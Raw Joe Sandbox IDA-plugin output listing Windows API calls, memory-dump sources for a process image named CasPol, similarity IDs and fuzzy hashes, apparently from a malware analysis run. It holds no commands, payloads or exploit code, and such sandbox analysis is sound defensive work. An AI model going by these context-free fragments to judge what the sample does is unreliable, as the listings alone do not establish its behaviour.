                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                                                    • malloc.MSVCRT ref: 00417459
                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                                                                    • free.MSVCRT ref: 0041747F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2605342592-0
                                                                                                                    • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                    • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                    • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2678498856-0
                                                                                                                    • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                    • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0040F673
                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2754987064-0
                                                                                                                    • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                    • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2754987064-0
                                                                                                                    • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                    • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 764393265-0
                                                                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                    APIs
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$System$File$LocalSpecific
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 979780441-0
                                                                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                    APIs
                                                                                                                    • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                    • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1386444988-0
                                                                                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                    APIs
                                                                                                                    • wcschr.MSVCRT ref: 0040F79E
                                                                                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                                    • String ID: "
                                                                                                                    • API String ID: 1983396471-123907689
                                                                                                                    • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                    • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                    APIs
                                                                                                                    • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                                    • String ID: %2.2X
                                                                                                                    • API String ID: 2789212964-323797159
                                                                                                                    • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                    • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintf
                                                                                                                    • String ID: %%-%d.%ds
                                                                                                                    • API String ID: 3988819677-2008345750
                                                                                                                    • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                    • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0040E770
                                                                                                                    • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendmemset
                                                                                                                    • String ID: F^@
                                                                                                                    • API String ID: 568519121-3652327722
                                                                                                                    • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                    • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PlacementWindowmemset
                                                                                                                    • String ID: WinPos
                                                                                                                    • API String ID: 4036792311-2823255486
                                                                                                                    • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                    • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                    APIs
                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                    • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                    • memset.MSVCRT ref: 0042BAAE
                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy$memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 438689982-0
                                                                                                                    • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                    • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@$memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1860491036-0
                                                                                                                    • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                    • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                    APIs
                                                                                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                    • free.MSVCRT ref: 0040A908
                                                                                                                    • free.MSVCRT ref: 0040A92B
                                                                                                                    • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 726966127-0
                                                                                                                    • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                    • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                    APIs
                                                                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                    • free.MSVCRT ref: 0040B201
                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                    • free.MSVCRT ref: 0040B224
                                                                                                                    • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 726966127-0
                                                                                                                    • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                    • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                    APIs
                                                                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                                                                    • free.MSVCRT ref: 0040B0FB
                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                    • free.MSVCRT ref: 0040B12C
                                                                                                                    • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3669619086-0
                                                                                                                    • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                    • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                    • malloc.MSVCRT ref: 00417407
                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                    • free.MSVCRT ref: 00417425
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2605342592-0
                                                                                                                    • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                    • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5